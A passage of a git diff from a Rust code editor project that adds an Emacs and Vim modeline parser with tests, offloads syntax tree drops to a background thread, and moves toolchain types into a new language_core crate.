+/// +/// Supports: +/// - Emacs modelines: -*- mode: rust; tab-width: 4; indent-tabs-mode: nil; -*- and "Local Variables" +/// - Vim modelines: vim: set ft=rust ts=4 sw=4 et: +pub fn parse_modeline(first_lines: &[&str], last_lines: &[&str]) -> Option { + let mut settings = ModelineSettings::default(); + + parse_modelines(first_lines, &mut settings); + + // Parse Emacs Local Variables in last lines + parse_emacs_local_variables(last_lines, &mut settings); + + // Also check for vim modelines in last lines if we don't have settings yet + if !settings.has_settings() { + parse_vim_modelines(last_lines, &mut settings); + } + + Some(settings).filter(|s| s.has_settings()) +} + +fn parse_modelines(modelines: &[&str], settings: &mut ModelineSettings) { + for line in modelines { + parse_emacs_modeline(line, settings); + // if emacs is set, do not check for vim modelines + if settings.has_settings() { + return; + } + } + + parse_vim_modelines(modelines, settings); +} + +static EMACS_MODELINE_RE: LazyLock = + LazyLock::new(|| Regex::new(r"-\*-\s*(.+?)\s*-\*-").expect("valid regex")); + +/// Parse Emacs-style modelines +/// Format: -*- mode: rust; tab-width: 4; indent-tabs-mode: nil; -*- +/// See Emacs (set-auto-mode) +fn parse_emacs_modeline(line: &str, settings: &mut ModelineSettings) { + let Some(captures) = EMACS_MODELINE_RE.captures(line) else { + return; + }; + let Some(modeline_content) = captures.get(1).map(|m| m.as_str()) else { + return; + }; + for part in modeline_content.split(';') { + parse_emacs_key_value(part, settings, true); + } +} + +/// Parse Emacs-style Local Variables block +/// +/// Emacs supports a "Local Variables" block at the end of files: +/// ```text +/// /* Local Variables: */ +/// /* mode: c */ +/// /* tab-width: 4 */ +/// /* End: */ +/// ``` +/// +/// Emacs related code is hack-local-variables--find-variables in +/// https://cgit.git.savannah.gnu.org/cgit/emacs.git/tree/lisp/files.el#n4346 +fn parse_emacs_local_variables(lines: &[&str], settings: 
&mut ModelineSettings) { + const LOCAL_VARIABLES: &str = "Local Variables:"; + + let Some((start_idx, prefix, suffix)) = lines.iter().enumerate().find_map(|(i, line)| { + let prefix_len = line.find(LOCAL_VARIABLES)?; + let suffix_start = prefix_len + LOCAL_VARIABLES.len(); + Some((i, line.get(..prefix_len)?, line.get(suffix_start..)?)) + }) else { + return; + }; + + let mut continuation = String::new(); + + for line in &lines[start_idx + 1..] { + let Some(content) = line + .strip_prefix(prefix) + .and_then(|l| l.strip_suffix(suffix)) + .map(str::trim) + else { + return; + }; + + if let Some(continued) = content.strip_suffix('\\') { + continuation.push_str(continued); + continue; + } + + let to_parse = if continuation.is_empty() { + content + } else { + continuation.push_str(content); + &continuation + }; + + if to_parse == "End:" { + return; + } + + parse_emacs_key_value(to_parse, settings, false); + continuation.clear(); + } +} + +fn parse_emacs_key_value(part: &str, settings: &mut ModelineSettings, bare: bool) { + let part = part.trim(); + if part.is_empty() { + return; + } + + if let Some((key, value)) = part.split_once(':') { + let key = key.trim(); + let value = value.trim(); + + match key.to_lowercase().as_str() { + "mode" => { + settings.mode = Some(value.to_string()); + } + "c-basic-offset" | "python-indent-offset" => { + if let Ok(size) = value.parse::() { + settings.indent_size = Some(size); + } + } + "fill-column" => { + if let Ok(size) = value.parse::() { + settings.preferred_line_length = Some(size); + } + } + "tab-width" => { + if let Ok(size) = value.parse::() { + settings.tab_size = Some(size); + } + } + "indent-tabs-mode" => { + settings.hard_tabs = Some(value != "nil"); + } + "electric-indent-mode" => { + settings.auto_indent = Some(value != "nil"); + } + "require-final-newline" => { + settings.ensure_final_newline = Some(value != "nil"); + } + "show-trailing-whitespace" => { + settings.show_trailing_whitespace = Some(value != "nil"); + } + key => 
settings + .emacs_extra_variables + .push((key.to_string(), value.to_string())), + } + } else if bare { + // Handle bare mode specification (e.g., -*- rust -*-) + settings.mode = Some(part.to_string()); + } +} + +fn parse_vim_modelines(modelines: &[&str], settings: &mut ModelineSettings) { + for line in modelines { + parse_vim_modeline(line, settings); + } +} + +static VIM_MODELINE_PATTERNS: LazyLock> = LazyLock::new(|| { + [ + // Second form: [text{white}]{vi:vim:Vim:}[white]se[t] {options}:[text] + // Allow escaped colons in options: match non-colon chars or backslash followed by any char + r"(?:^|\s)(vi|vim|Vim):(?:\s*)se(?:t)?\s+((?:[^\\:]|\\.)*):", + // First form: [text{white}]{vi:vim:}[white]{options} + r"(?:^|\s+)(vi|vim):(?:\s*(.+))", + ] + .iter() + .map(|pattern| Regex::new(pattern).expect("valid regex")) + .collect() +}); + +/// Parse Vim-style modelines +/// Supports both forms: +/// 1. First form: vi:noai:sw=3 ts=6 +/// 2. Second form: vim: set ft=rust ts=4 sw=4 et: +fn parse_vim_modeline(line: &str, settings: &mut ModelineSettings) { + for re in VIM_MODELINE_PATTERNS.iter() { + if let Some(captures) = re.captures(line) { + if let Some(options) = captures.get(2) { + parse_vim_settings(options.as_str().trim(), settings); + break; + } + } + } +} + +fn parse_vim_settings(content: &str, settings: &mut ModelineSettings) { + fn split_colon_unescape(input: &str) -> Vec { + let mut split = Vec::new(); + let mut str = String::new(); + let mut chars = input.chars().peekable(); + while let Some(c) = chars.next() { + if c == '\\' { + match chars.next() { + Some(escaped_char) => str.push(escaped_char), + None => str.push('\\'), + } + } else if c == ':' { + split.push(std::mem::take(&mut str)); + } else { + str.push(c); + } + } + split.push(str); + split + } + + let parts = split_colon_unescape(content); + for colon_part in parts { + let colon_part = colon_part.trim(); + if colon_part.is_empty() { + continue; + } + + // Each colon part might contain space-separated 
options + for part in colon_part.split_whitespace() { + if let Some((key, value)) = part.split_once('=') { + match key { + "ft" | "filetype" => { + settings.mode = Some(value.to_string()); + } + "ts" | "tabstop" => { + if let Ok(size) = value.parse::() { + settings.tab_size = Some(size); + } + } + "sw" | "shiftwidth" => { + if let Ok(size) = value.parse::() { + settings.indent_size = Some(size); + } + } + "tw" | "textwidth" => { + if let Ok(size) = value.parse::() { + settings.preferred_line_length = Some(size); + } + } + _ => { + settings + .vim_extra_variables + .push((key.to_string(), Some(value.to_string()))); + } + } + } else { + match part { + "ai" | "autoindent" => { + settings.auto_indent = Some(true); + } + "noai" | "noautoindent" => { + settings.auto_indent = Some(false); + } + "et" | "expandtab" => { + settings.hard_tabs = Some(false); + } + "noet" | "noexpandtab" => { + settings.hard_tabs = Some(true); + } + "eol" | "endofline" => { + settings.ensure_final_newline = Some(true); + } + "noeol" | "noendofline" => { + settings.ensure_final_newline = Some(false); + } + "set" => { + // Ignore the "set" keyword itself + } + _ => { + settings.vim_extra_variables.push((part.to_string(), None)); + } + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use indoc::indoc; + use pretty_assertions::assert_eq; + + #[test] + fn test_no_modeline() { + let content = "This is just regular content\nwith no modeline"; + assert!(parse_modeline(&[content], &[content]).is_none()); + } + + #[test] + fn test_emacs_bare_mode() { + let content = "/* -*- rust -*- */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + ..Default::default() + } + ); + } + + #[test] + fn test_emacs_modeline_parsing() { + let content = "/* -*- mode: rust; tab-width: 4; indent-tabs-mode: nil; -*- */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + 
ModelineSettings { + mode: Some("rust".to_string()), + tab_size: Some(NonZeroU32::new(4).unwrap()), + hard_tabs: Some(false), + ..Default::default() + } + ); + } + + #[test] + fn test_emacs_last_line_parsing() { + let content = indoc! {r#" + # Local Variables: + # compile-command: "cc foo.c -Dfoo=bar -Dhack=whatever \ + # -Dmumble=blaah" + # End: + "#} + .lines() + .collect::>(); + let settings = parse_modeline(&[], &content).unwrap(); + assert_eq!( + settings, + ModelineSettings { + emacs_extra_variables: vec![( + "compile-command".to_string(), + "\"cc foo.c -Dfoo=bar -Dhack=whatever -Dmumble=blaah\"".to_string() + ),], + ..Default::default() + } + ); + + let content = indoc! {" + foo + /* Local Variables: */ + /* eval: (font-lock-mode -1) */ + /* mode: old-c */ + /* mode: c */ + /* End: */ + /* mode: ignored */ + "} + .lines() + .collect::>(); + let settings = parse_modeline(&[], &content).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("c".to_string()), + emacs_extra_variables: vec![( + "eval".to_string(), + "(font-lock-mode -1)".to_string() + ),], + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_parsing() { + // Test second form (set format) + let content = "// vim: set ft=rust ts=4 sw=4 et:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + tab_size: Some(NonZeroU32::new(4).unwrap()), + hard_tabs: Some(false), + indent_size: Some(NonZeroU32::new(4).unwrap()), + ..Default::default() + } + ); + + // Test first form (colon-separated) + let content = "vi:noai:sw=3:ts=6"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + tab_size: Some(NonZeroU32::new(6).unwrap()), + auto_indent: Some(false), + indent_size: Some(NonZeroU32::new(3).unwrap()), + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_first_form() { + // Examples from vim specification: 
vi:noai:sw=3 ts=6 + let content = " vi:noai:sw=3 ts=6 "; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + tab_size: Some(NonZeroU32::new(6).unwrap()), + auto_indent: Some(false), + indent_size: Some(NonZeroU32::new(3).unwrap()), + ..Default::default() + } + ); + + // Test with filetype + let content = "vim:ft=python:ts=8:noet"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("python".to_string()), + tab_size: Some(NonZeroU32::new(8).unwrap()), + hard_tabs: Some(true), + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_second_form() { + // Examples from vim specification: /* vim: set ai tw=75: */ + let content = "/* vim: set ai tw=75: */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + auto_indent: Some(true), + preferred_line_length: Some(NonZeroU32::new(75).unwrap()), + ..Default::default() + } + ); + + // Test with 'Vim:' (capital V) + let content = "/* Vim: set ai tw=75: */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + auto_indent: Some(true), + preferred_line_length: Some(NonZeroU32::new(75).unwrap()), + ..Default::default() + } + ); + + // Test 'se' shorthand + let content = "// vi: se ft=c ts=4:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("c".to_string()), + tab_size: Some(NonZeroU32::new(4).unwrap()), + ..Default::default() + } + ); + + // Test complex modeline with encoding + let content = "# vim: set ft=python ts=4 sw=4 et encoding=utf-8:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("python".to_string()), + tab_size: Some(NonZeroU32::new(4).unwrap()), + hard_tabs: Some(false), + indent_size: Some(NonZeroU32::new(4).unwrap()), + 
vim_extra_variables: vec![("encoding".to_string(), Some("utf-8".to_string()))], + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_edge_cases() { + // Test modeline at start of line (compatibility with version 3.0) + let content = "vi:ts=2:et"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + tab_size: Some(NonZeroU32::new(2).unwrap()), + hard_tabs: Some(false), + ..Default::default() + } + ); + + // Test vim at start of line + let content = "vim:ft=rust:noet"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + hard_tabs: Some(true), + ..Default::default() + } + ); + + // Test mixed boolean flags + let content = "vim: set wrap noet ts=8:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + tab_size: Some(NonZeroU32::new(8).unwrap()), + hard_tabs: Some(true), + vim_extra_variables: vec![("wrap".to_string(), None)], + ..Default::default() + } + ); + } + + #[test] + fn test_vim_modeline_invalid_cases() { + // Test malformed options are ignored gracefully + let content = "vim: set ts=invalid ft=rust:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!( + settings, + ModelineSettings { + mode: Some("rust".to_string()), + ..Default::default() + } + ); + + // Test empty modeline content - this should still work as there might be options + let content = "vim: set :"; + // This should return None because there are no actual options + let result = parse_modeline(&[content], &[]); + assert!(result.is_none(), "Expected None but got: {:?}", result); + + // Test modeline without proper format + let content = "not a modeline"; + assert!(parse_modeline(&[content], &[]).is_none()); + + // Test word that looks like modeline but isn't + let content = "example: this could be confused with ex:"; + assert!(parse_modeline(&[content], 
&[]).is_none()); + } + + #[test] + fn test_vim_language_mapping() { + // Test vim-specific language mappings + let content = "vim: set ft=sh:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("sh".to_string())); + + let content = "vim: set ft=golang:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("golang".to_string())); + + let content = "vim: set filetype=js:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("js".to_string())); + } + + #[test] + fn test_vim_extra_variables() { + // Test that unknown vim options are stored as extra variables + let content = "vim: set foldmethod=marker conceallevel=2 custom=value:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + + assert!( + settings + .vim_extra_variables + .contains(&("foldmethod".to_string(), Some("marker".to_string()))) + ); + assert!( + settings + .vim_extra_variables + .contains(&("conceallevel".to_string(), Some("2".to_string()))) + ); + assert!( + settings + .vim_extra_variables + .contains(&("custom".to_string(), Some("value".to_string()))) + ); + } + + #[test] + fn test_modeline_position() { + // Test modeline in first lines + let first_lines = ["#!/bin/bash", "# vim: set ft=bash ts=4:"]; + let settings = parse_modeline(&first_lines, &[]).unwrap(); + assert_eq!(settings.mode, Some("bash".to_string())); + + // Test modeline in last lines + let last_lines = ["", "/* vim: set ft=c: */"]; + let settings = parse_modeline(&[], &last_lines).unwrap(); + assert_eq!(settings.mode, Some("c".to_string())); + + // Test no modeline found + let content = ["regular content", "no modeline here"]; + assert!(parse_modeline(&content, &content).is_none()); + } + + #[test] + fn test_vim_modeline_version_checks() { + // Note: Current implementation doesn't support version checks yet + // These are tests for future implementation based on vim spec + + // Test version-specific 
modelines (currently ignored in our implementation) + let content = "/* vim700: set foldmethod=marker */"; + // Should be ignored for now since we don't support version checks + assert!(parse_modeline(&[content], &[]).is_none()); + + let content = "/* vim>702: set cole=2: */"; + // Should be ignored for now since we don't support version checks + assert!(parse_modeline(&[content], &[]).is_none()); + } + + #[test] + fn test_vim_modeline_colon_escaping() { + // Test colon escaping as mentioned in vim spec + + // According to vim spec: "if you want to include a ':' in a set command precede it with a '\'" + let content = r#"/* vim: set fdm=expr fde=getline(v\:lnum)=~'{'?'>1'\:'1': */"#; + + let result = parse_modeline(&[content], &[]).unwrap(); + + // The modeline should parse fdm=expr and fde=getline(v:lnum)=~'{'?'>1':'1' + // as extra variables since they're not recognized settings + assert_eq!(result.vim_extra_variables.len(), 2); + assert_eq!( + result.vim_extra_variables[0], + ("fdm".to_string(), Some("expr".to_string())) + ); + assert_eq!( + result.vim_extra_variables[1], + ( + "fde".to_string(), + Some("getline(v:lnum)=~'{'?'>1':'1'".to_string()) + ) + ); + } + + #[test] + fn test_vim_modeline_whitespace_requirements() { + // Test whitespace requirements from vim spec + + // Valid: whitespace before vi/vim + let content = " vim: set ft=rust:"; + assert!(parse_modeline(&[content], &[]).is_some()); + + // Valid: tab before vi/vim + let content = "\tvim: set ft=rust:"; + assert!(parse_modeline(&[content], &[]).is_some()); + + // Valid: vi/vim at start of line (compatibility) + let content = "vim: set ft=rust:"; + assert!(parse_modeline(&[content], &[]).is_some()); + } + + #[test] + fn test_vim_modeline_comprehensive_examples() { + // Real-world examples from vim documentation and common usage + + // Python example + let content = "# vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + 
assert_eq!(settings.hard_tabs, Some(false)); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(4).unwrap())); + + // C example with multiple options + let content = "/* vim: set ts=8 sw=8 noet ai cindent: */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(8).unwrap())); + assert_eq!(settings.hard_tabs, Some(true)); + assert!( + settings + .vim_extra_variables + .contains(&("cindent".to_string(), None)) + ); + + // Shell script example + let content = "# vi: set ft=sh ts=2 sw=2 et:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("sh".to_string())); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(2).unwrap())); + assert_eq!(settings.hard_tabs, Some(false)); + + // First form colon-separated + let content = "vim:ft=xml:ts=2:sw=2:et"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("xml".to_string())); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(2).unwrap())); + assert_eq!(settings.hard_tabs, Some(false)); + } + + #[test] + fn test_combined_emacs_vim_detection() { + // Test that both emacs and vim modelines can be detected in the same file + + let first_lines = [ + "#!/usr/bin/env python3", + "# -*- require-final-newline: t; -*-", + "# vim: set ft=python ts=4 sw=4 et:", + ]; + + // Should find the emacs modeline first (with coding) + let settings = parse_modeline(&first_lines, &[]).unwrap(); + assert_eq!(settings.ensure_final_newline, Some(true)); + assert_eq!(settings.tab_size, None); + + // Test vim-only content + let vim_only = ["# vim: set ft=python ts=4 sw=4 et:"]; + let settings = parse_modeline(&vim_only, &[]).unwrap(); + assert_eq!(settings.mode, Some("python".to_string())); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(4).unwrap())); + assert_eq!(settings.hard_tabs, Some(false)); + } +} diff --git a/crates/language/src/proto.rs b/crates/language/src/proto.rs index 
89c44513067f6d2309d68a9f38984988358d8877..5e3179e929da012cce8e7da6b436e89c0c4519de 100644 --- a/crates/language/src/proto.rs +++ b/crates/language/src/proto.rs @@ -174,11 +174,11 @@ pub fn serialize_selection(selection: &Selection) -> proto::Selection { id: selection.id as u64, start: Some(proto::EditorAnchor { anchor: Some(serialize_anchor(&selection.start)), - excerpt_id: 0, + excerpt_id: None, }), end: Some(proto::EditorAnchor { anchor: Some(serialize_anchor(&selection.end)), - excerpt_id: 0, + excerpt_id: None, }), reversed: selection.reversed, } @@ -260,7 +260,7 @@ pub fn serialize_anchor(anchor: &Anchor) -> proto::Anchor { Bias::Left => proto::Bias::Left as i32, Bias::Right => proto::Bias::Right as i32, }, - buffer_id: anchor.buffer_id.map(Into::into), + buffer_id: Some(anchor.buffer_id.into()), } } @@ -498,7 +498,7 @@ pub fn deserialize_anchor(anchor: proto::Anchor) -> Option { timestamp, anchor.offset as u32, bias, - buffer_id, + buffer_id?, )) } diff --git a/crates/language/src/syntax_map.rs b/crates/language/src/syntax_map.rs index bd24424679f3e6cb02303c91e0d86db335cd0a26..b73276ffd92be8915e2272b5242770fc52854af1 100644 --- a/crates/language/src/syntax_map.rs +++ b/crates/language/src/syntax_map.rs @@ -13,12 +13,12 @@ use std::{ collections::BinaryHeap, fmt, iter, ops::{ControlFlow, Deref, DerefMut, Range}, - sync::Arc, + sync::{Arc, LazyLock}, time::{Duration, Instant}, }; use streaming_iterator::StreamingIterator; use sum_tree::{Bias, Dimensions, SeekTarget, SumTree}; -use text::{Anchor, BufferSnapshot, OffsetRangeExt, Point, Rope, ToOffset, ToPoint}; +use text::{Anchor, BufferId, BufferSnapshot, OffsetRangeExt, Point, Rope, ToOffset, ToPoint}; use tree_sitter::{ Node, Query, QueryCapture, QueryCaptures, QueryCursor, QueryMatch, QueryMatches, QueryPredicateArg, @@ -40,6 +40,35 @@ pub struct SyntaxSnapshot { update_count: usize, } +// Dropping deep treesitter Trees can be quite slow due to deallocating lots of memory. 
+// To avoid blocking the main thread, we offload the drop operation to a background thread. +impl Drop for SyntaxSnapshot { + fn drop(&mut self) { + static DROP_TX: LazyLock>> = + LazyLock::new(|| { + let (tx, rx) = std::sync::mpsc::channel(); + std::thread::Builder::new() + .name("SyntaxSnapshot::drop".into()) + .spawn(move || while let Ok(_) = rx.recv() {}) + .expect("failed to spawn drop thread"); + tx + }); + // This does allocate a new Arc, but it's cheap and avoids blocking the main thread without needing to use an `Option` or `MaybeUninit`. + let _ = DROP_TX.send(std::mem::replace( + &mut self.layers, + SumTree::from_summary(SyntaxLayerSummary { + min_depth: Default::default(), + max_depth: Default::default(), + // Deliberately bogus anchors, doesn't matter in this context + range: Anchor::min_min_range_for_buffer(BufferId::new(1).unwrap()), + last_layer_range: Anchor::min_min_range_for_buffer(BufferId::new(1).unwrap()), + last_layer_language: Default::default(), + contains_unknown_injections: Default::default(), + }), + )); + } +} + #[derive(Default)] pub struct SyntaxMapCaptures<'a> { layers: Vec>, @@ -567,7 +596,7 @@ impl SyntaxSnapshot { let bounded_position = SyntaxLayerPositionBeforeChange { position: position.clone(), - change: changed_regions.start_position(), + change: changed_regions.start_position(text.remote_id()), }; if bounded_position.cmp(cursor.start(), text).is_gt() { let slice = cursor.slice(&bounded_position, Bias::Left); @@ -1100,7 +1129,7 @@ impl<'a> SyntaxMapCaptures<'a> { let grammar_index = result .grammars .iter() - .position(|g| g.id == grammar.id()) + .position(|g| g.id() == grammar.id()) .unwrap_or_else(|| { result.grammars.push(grammar); result.grammars.len() - 1 @@ -1244,7 +1273,7 @@ impl<'a> SyntaxMapMatches<'a> { let grammar_index = result .grammars .iter() - .position(|g| g.id == grammar.id()) + .position(|g| g.id() == grammar.id()) .unwrap_or_else(|| { result.grammars.push(grammar); result.grammars.len() - 1 @@ -1925,11 
+1954,11 @@ impl ChangedRegion { } impl ChangeRegionSet { - fn start_position(&self) -> ChangeStartPosition { + fn start_position(&self, buffer_id: BufferId) -> ChangeStartPosition { self.0.first().map_or( ChangeStartPosition { depth: usize::MAX, - position: Anchor::MAX, + position: Anchor::max_for_buffer(buffer_id), }, |region| ChangeStartPosition { depth: region.depth, @@ -1978,32 +2007,28 @@ impl ChangeRegionSet { } } -impl Default for SyntaxLayerSummary { - fn default() -> Self { +impl sum_tree::Summary for SyntaxLayerSummary { + type Context<'a> = &'a BufferSnapshot; + + fn zero(buffer: &BufferSnapshot) -> Self { Self { max_depth: 0, min_depth: 0, - range: Anchor::MAX..Anchor::MIN, - last_layer_range: Anchor::MIN..Anchor::MAX, + range: Anchor::max_for_buffer(buffer.remote_id()) + ..Anchor::min_for_buffer(buffer.remote_id()), + last_layer_range: Anchor::min_for_buffer(buffer.remote_id()) + ..Anchor::max_for_buffer(buffer.remote_id()), last_layer_language: None, contains_unknown_injections: false, } } -} - -impl sum_tree::Summary for SyntaxLayerSummary { - type Context<'a> = &'a BufferSnapshot; - - fn zero(_cx: &BufferSnapshot) -> Self { - Default::default() - } fn add_summary(&mut self, other: &Self, buffer: Self::Context<'_>) { if other.max_depth > self.max_depth { self.max_depth = other.max_depth; self.range = other.range.clone(); } else { - if self.range == (Anchor::MAX..Anchor::MAX) { + if self.range.start.is_max() && self.range.end.is_max() { self.range.start = other.range.start; } if other.range.end.cmp(&self.range.end, buffer).is_gt() { diff --git a/crates/language/src/syntax_map/syntax_map_tests.rs b/crates/language/src/syntax_map/syntax_map_tests.rs index b7fec897b98aed7902cd25de65e008ba58ee55f9..247076b6f25e3cf62913c93d65ae352109effafa 100644 --- a/crates/language/src/syntax_map/syntax_map_tests.rs +++ b/crates/language/src/syntax_map/syntax_map_tests.rs @@ -1492,7 +1492,7 @@ fn python_lang() -> Language { ) .with_queries(LanguageQueries { injections: 
Some(Cow::from(include_str!( - "../../../languages/src/python/injections.scm" + "../../../grammars/src/python/injections.scm" ))), ..Default::default() }) diff --git a/crates/language/src/task_context.rs b/crates/language/src/task_context.rs index b8cc6d13fff14576ca938e36d8982973f6307912..dc59d21bd73a2d4a8e1d4a4c765195afffd2ce67 100644 --- a/crates/language/src/task_context.rs +++ b/crates/language/src/task_context.rs @@ -1,11 +1,11 @@ use std::{ops::Range, path::PathBuf, sync::Arc}; -use crate::{File, LanguageToolchainStore, Location, Runnable}; +use crate::{Buffer, LanguageToolchainStore, Location, Runnable}; use anyhow::Result; use collections::HashMap; use fs::Fs; -use gpui::{App, Task}; +use gpui::{App, Entity, Task}; use lsp::LanguageServerName; use task::{TaskTemplates, TaskVariables}; use text::BufferId; @@ -37,7 +37,7 @@ pub trait ContextProvider: Send + Sync { } /// Provides all tasks, associated with the current language. - fn associated_tasks(&self, _: Option>, _: &App) -> Task> { + fn associated_tasks(&self, _: Option>, _: &App) -> Task> { Task::ready(None) } diff --git a/crates/language/src/toolchain.rs b/crates/language/src/toolchain.rs index 0d80f84e7ec1dc330db823a0938421a1f5ad85c9..d33700b1724f964597c66d9df0bc792210c96e42 100644 --- a/crates/language/src/toolchain.rs +++ b/crates/language/src/toolchain.rs @@ -4,95 +4,21 @@ //! which is a set of tools used to interact with the projects written in said language. //! For example, a Python project can have an associated virtual environment; a Rust project can have a toolchain override. -use std::{ - path::{Path, PathBuf}, - sync::Arc, -}; +use std::{path::PathBuf, sync::Arc}; use async_trait::async_trait; use collections::HashMap; -use fs::Fs; + use futures::future::BoxFuture; -use gpui::{App, AsyncApp, SharedString}; +use gpui::{App, AsyncApp}; use settings::WorktreeId; use task::ShellKind; use util::rel_path::RelPath; -use crate::{LanguageName, ManifestName}; - -/// Represents a single toolchain. 
-#[derive(Clone, Eq, Debug)] -pub struct Toolchain { - /// User-facing label - pub name: SharedString, - /// Absolute path - pub path: SharedString, - pub language_name: LanguageName, - /// Full toolchain data (including language-specific details) - pub as_json: serde_json::Value, -} - -/// Declares a scope of a toolchain added by user. -/// -/// When the user adds a toolchain, we give them an option to see that toolchain in: -/// - All of their projects -/// - A project they're currently in. -/// - Only in the subproject they're currently in. -#[derive(Clone, Debug, Eq, PartialEq, Ord, PartialOrd)] -pub enum ToolchainScope { - Subproject(Arc, Arc), - Project, - /// Available in all projects on this box. It wouldn't make sense to show suggestions across machines. - Global, -} - -impl ToolchainScope { - pub fn label(&self) -> &'static str { - match self { - ToolchainScope::Subproject(_, _) => "Subproject", - ToolchainScope::Project => "Project", - ToolchainScope::Global => "Global", - } - } - - pub fn description(&self) -> &'static str { - match self { - ToolchainScope::Subproject(_, _) => { - "Available only in the subproject you're currently in." - } - ToolchainScope::Project => "Available in all locations in your current project.", - ToolchainScope::Global => "Available in all of your projects on this machine.", - } - } -} - -impl std::hash::Hash for Toolchain { - fn hash(&self, state: &mut H) { - let Self { - name, - path, - language_name, - as_json: _, - } = self; - name.hash(state); - path.hash(state); - language_name.hash(state); - } -} +use crate::LanguageName; -impl PartialEq for Toolchain { - fn eq(&self, other: &Self) -> bool { - let Self { - name, - path, - language_name, - as_json: _, - } = self; - // Do not use as_json for comparisons; it shouldn't impact equality, as it's not user-surfaced. - // Thus, there could be multiple entries that look the same in the UI. 
- (name, path, language_name).eq(&(&other.name, &other.path, &other.language_name)) - } -} +// Re-export core data types from language_core. +pub use language_core::{Toolchain, ToolchainList, ToolchainMetadata, ToolchainScope}; #[async_trait] pub trait ToolchainLister: Send + Sync + 'static { @@ -102,7 +28,6 @@ pub trait ToolchainLister: Send + Sync + 'static { worktree_root: PathBuf, subroot_relative_path: Arc, project_env: Option>, - fs: &dyn Fs, ) -> ToolchainList; /// Given a user-created toolchain, resolve lister-specific details. @@ -111,7 +36,6 @@ pub trait ToolchainLister: Send + Sync + 'static { &self, path: PathBuf, project_env: Option>, - fs: &dyn Fs, ) -> anyhow::Result; fn activation_script( @@ -125,16 +49,6 @@ pub trait ToolchainLister: Send + Sync + 'static { fn meta(&self) -> ToolchainMetadata; } -#[derive(Clone, PartialEq, Eq, Hash)] -pub struct ToolchainMetadata { - /// Returns a term which we should use in UI to refer to toolchains produced by a given `[ToolchainLister]`. - pub term: SharedString, - /// A user-facing placeholder describing the semantic meaning of a path to a new toolchain. - pub new_toolchain_placeholder: SharedString, - /// The name of the manifest file for this toolchain. 
- pub manifest_name: ManifestName, -} - #[async_trait(?Send)] pub trait LanguageToolchainStore: Send + Sync + 'static { async fn active_toolchain( @@ -168,31 +82,3 @@ impl LanguageToolchainStore for T { self.active_toolchain(worktree_id, &relative_path, language_name, cx) } } - -type DefaultIndex = usize; -#[derive(Default, Clone, Debug)] -pub struct ToolchainList { - pub toolchains: Vec, - pub default: Option, - pub groups: Box<[(usize, SharedString)]>, -} - -impl ToolchainList { - pub fn toolchains(&self) -> &[Toolchain] { - &self.toolchains - } - pub fn default_toolchain(&self) -> Option { - self.default.and_then(|ix| self.toolchains.get(ix)).cloned() - } - pub fn group_for_index(&self, index: usize) -> Option<(usize, SharedString)> { - if index >= self.toolchains.len() { - return None; - } - let first_equal_or_greater = self - .groups - .partition_point(|(group_lower_bound, _)| group_lower_bound <= &index); - self.groups - .get(first_equal_or_greater.checked_sub(1)?) - .cloned() - } -} diff --git a/crates/language_core/Cargo.toml b/crates/language_core/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..4861632b4663c860706525c65cd8607133b3ec71 --- /dev/null +++ b/crates/language_core/Cargo.toml @@ -0,0 +1,29 @@ +[package] +name = "language_core" +version = "0.1.0" +edition = "2024" +publish = false + +[lib] +path = "src/language_core.rs" + +[dependencies] +anyhow.workspace = true +collections.workspace = true +gpui.workspace = true +log.workspace = true +lsp.workspace = true +parking_lot.workspace = true +regex.workspace = true +schemars.workspace = true +serde.workspace = true +serde_json.workspace = true +toml.workspace = true +tree-sitter.workspace = true +util.workspace = true + +[dev-dependencies] +gpui = { workspace = true, features = ["test-support"] } + +[features] +test-support = [] diff --git a/crates/rich_text/LICENSE-GPL b/crates/language_core/LICENSE-GPL similarity index 100% rename from crates/rich_text/LICENSE-GPL 
